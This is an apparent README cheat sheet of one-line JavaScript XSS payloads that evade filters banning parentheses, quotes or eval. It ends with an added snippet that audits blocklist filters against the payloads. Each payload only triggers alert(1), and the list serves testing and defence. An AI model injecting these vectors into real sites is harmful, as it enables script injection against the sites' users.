# XSS oneliners payloads that rocks your nuts!

This is a list that I often use as a reference tool and that I decided to publish. If you want to contribute, you're welcome; just tweet me at [@dsopas](https://twitter.com/dsopas) or something. Criticism is always welcome!

BTW: the result is always to alert the number 1; if you want a real attack scenario, just modify the vectors below.

## Without parentheses and quotes

```javascript
self[0X10f8809.toString`36`]`1`
```

PS: You can also use `top` instead of `self` to cut down 1 char.

Online: [https://jsfiddle.net/hx7kypv6/](https://jsfiddle.net/hx7kypv6/) by [@aemkei](https://twitter.com/aemkei)

```javascript
x=alert,x`1`
```

Online: [https://jsfiddle.net/0bp4b2mf/](https://jsfiddle.net/0bp4b2mf/) - don't know really...

## Without quotes or backticks

```javascript
Object.bind(null,alert)()(1)
```

Online: [https://jsfiddle.net/w99tv481/](https://jsfiddle.net/w99tv481/) by [@garethheyes](https://twitter.com/garethheyes)

## Eval without eval() and without quotes

```javascript
atob.constructor`alert\`1\````
```

Online: [https://jsfiddle.net/r4tdhs1L/](https://jsfiddle.net/r4tdhs1L/) by [@aemkei](https://twitter.com/aemkei)

## Other evading payloads

```javascript
Function('x=alert`1`','y')()
```

Online: [https://jsfiddle.net/qawpegx9/](https://jsfiddle.net/qawpegx9/) by [@garethheyes](https://twitter.com/garethheyes)

```javascript
/1/[Symbol.replace]('1',alert)
```

Online: [https://jsfiddle.net/7m9ex6L8/](https://jsfiddle.net/7m9ex6L8/) by [@garethheyes](https://twitter.com/garethheyes)

```javascript
Array.from([1],alert)
```

Online: [https://jsfiddle.net/ck5v3zgk/](https://jsfiddle.net/ck5v3zgk/) by [@garethheyes](https://twitter.com/garethheyes)

# Resources

* [XSSChallengeWiki](https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml)
* [JSFuck - Write any JavaScript with 6 Characters](https://github.com/aemkei/jsfuck)
* [HTML5 Security Cheatsheet](https://html5sec.org/)
* [XSS Polyglot Challenge](http://polyglot.innerht.ml/)
* [XSS Mindmap](https://github.com/jackmasa/XSS.png)

# Talks

* [AppSec EU 2017 Don't Trust The DOM: Bypassing XSS Mitigations Via Script Gadgets by Sebastian Lekies](https://www.youtube.com/watch?v=p07acPBi-qw)
* [AppSec EU15 - Gareth Heyes - XSS Horror Show](https://www.youtube.com/watch?v=yv5OtiIJwEE)
* [nullcon Goa 2015: ECMA Script 6 from an Attacker's Perspective by Mario Heiderich](https://www.youtube.com/watch?v=QnqFq-lcJ1I)
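
For checking an input filter against the vectors in the payload sections above, the following added example (not part of the original list; the filter names and the `audit` and `insufficientFilters` helpers are hypothetical) reports which of the page's payloads each character or keyword blocklist lets through:

```javascript
// Added example, not from the original README: which of the page's vectors
// does each simple blocklist let through? Filter names are hypothetical.
const vectors = {
  toString36:      "self[0X10f8809.toString`36`]`1`",
  taggedAlias:     "x=alert,x`1`",
  objectBind:      "Object.bind(null,alert)()(1)",
  atobConstructor: "atob.constructor`alert\\`1\\````",
  functionCtor:    "Function('x=alert`1`','y')()",
  symbolReplace:   "/1/[Symbol.replace]('1',alert)",
  arrayFrom:       "Array.from([1],alert)",
};

// Each filter rejects input matching its pattern (no /g flag, so test() is stateless).
const filters = {
  noParens:    /[()]/,
  noQuotes:    /['"]/,
  noBackticks: /`/,
  noAlertWord: /alert/i,
  noEvalWord:  /eval/i,
};

// Returns { filterName: [names of vectors the filter does NOT reject] }.
function audit(filterSet, vectorSet) {
  const report = {};
  for (const [name, pattern] of Object.entries(filterSet)) {
    report[name] = Object.keys(vectorSet).filter((v) => !pattern.test(vectorSet[v]));
  }
  return report;
}

// Filters that at least one vector passes, i.e. filters that are insufficient alone.
function insufficientFilters(report) {
  return Object.keys(report).filter((name) => report[name].length > 0);
}

const report = audit(filters, vectors);
for (const [name, passed] of Object.entries(report)) {
  console.log(`${name}: ${passed.length}/7 pass -> ${passed.join(", ")}`);
}
```

Every filter here lets at least one vector through, which is why character or keyword blocklists cannot stand in for context-aware output encoding and a Content Security Policy.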